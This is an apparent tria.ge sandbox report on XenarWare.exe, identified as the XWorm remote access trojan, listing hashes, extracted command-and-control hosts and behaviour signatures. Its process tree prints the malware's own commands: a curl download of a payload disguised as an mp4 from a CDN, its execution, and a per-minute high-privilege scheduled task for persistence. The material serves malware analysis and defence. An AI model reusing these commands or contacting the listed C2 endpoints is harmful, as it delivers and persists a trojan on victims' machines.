Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

7

XenarWare.exe

windows7-x64

7

XenarWare.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/04/2024, 03:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XenarWare.exe

  • Size

    59KB

  • MD5

    88f95b4a2d5af8ee7893a11abecb6ace

  • SHA1

    5c349881da20c6ad25d7eabeaa41d1ae2d2ad8f2

  • SHA256

    af67708e9be6571551147ff1840a555cadd1ea0150a91001e00904a8cc7881b6

  • SHA512

    996fb4ec5a81648a2e5b706d95185b0ae73c65744a146e70bf06db076882474fc677a9095430ecbda108cbc6357ae3de4a1407eafd3a7a9e915f11476eaa0c20

  • SSDEEP

    1536:ZrPJVKjbcknWSOYvTfkWkFM79yQVo5hWyZM+c:ZLJMjbcHDdMwQKDW7

Score
10/10
xwormpersistencerattrojanupx

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:23638

209.25.140.1:5525:23638

bring-recorder.gl.at.ply.gg:23638

action-yesterday.gl.at.ply.gg:23638

147.185.221.19:23638

then-wheel.gl.at.ply.gg::23638

then-wheel.gl.at.ply.gg:23638

teen-modes.gl.at.ply.gg:23638
Mutex

sk3UbSOs3RzNpgph

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    uwumonster.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\XenarWare.exe
    "C:\Users\Admin\AppData\Local\Temp\XenarWare.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2896.tmp\2897.tmp\2898.bat C:\Users\Admin\AppData\Local\Temp\XenarWare.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1404
        • C:\Windows\system32\curl.exe
          curl https://cdn.glitch.global/52845225-8ba1-4c7a-8921-b35d932319d9/yar.mp4?v=1713321691381 --output "C:\Users\Admin\AppData\Local\yar.wow"
          3⤵
            PID:888
          • C:\Users\Admin\AppData\Local\yar.wow
            C:\Users\Admin\AppData\Local\yar.wow
            3⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4320
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "uwumonster" /tr "C:\Users\Admin\AppData\Local\uwumonster.exe"
              4⤵
              • Creates scheduled task(s)
              PID:5008
      • C:\Users\Admin\AppData\Local\uwumonster.exe
        C:\Users\Admin\AppData\Local\uwumonster.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2012
      • C:\Users\Admin\AppData\Local\uwumonster.exe
        C:\Users\Admin\AppData\Local\uwumonster.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5040
      • C:\Users\Admin\AppData\Local\uwumonster.exe
        C:\Users\Admin\AppData\Local\uwumonster.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4336

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uwumonster.exe.log
        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\2896.tmp\2897.tmp\2898.bat
        Filesize

        2KB

        MD5

        51737caef60bc780cc1493e2a402ecfa

        SHA1

        26939c4fcc49b780ad4ef1023e8b12714417d0d5

        SHA256

        83897f7fd4fcf3800460c570c15546f40dd62ce6d4859c6cb60573c2e9afb1de

        SHA512

        0191edf228646a36dbda406000f717056c3b0227a9c233906b99b378a3ee09173caa3f2a68ced100028ae07e8931868d44368e5d77f24cd7dee9a73f6dedd6a5

        Download Submit

      • C:\Users\Admin\AppData\Local\yar.wow
        Filesize

        36KB

        MD5

        830cb7605a79c2b4de44073684b0ea84

        SHA1

        d06b0b2cbf859612122c53e170ad96ac75dade04

        SHA256

        75d1a4db620da708121fa7496cbf73b32c45d3c521c2f5fa4c86acc93ba65df8

        SHA512

        9a0747aa726a76d123134d393eacce76651d3ecf6b6ec53c415f48ee00f890018eb391bfb425a4491ae2fc055fc16695d656589ebdd69d68b54d35b2883ba321

        Download Submit

      • memory/1312-0-0x0000000140000000-0x0000000140028000-memory.dmp

        Filesize

        160KB

        Download

      • memory/1312-14-0x0000000140000000-0x0000000140028000-memory.dmp

        Filesize

        160KB

        Download

      • memory/2012-22-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2012-20-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4320-19-0x000000001B710000-0x000000001B720000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4320-16-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4320-13-0x000000001B710000-0x000000001B720000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4320-8-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4320-7-0x0000000000B50000-0x0000000000B60000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4336-41-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4336-42-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/5040-32-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/5040-33-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

        Download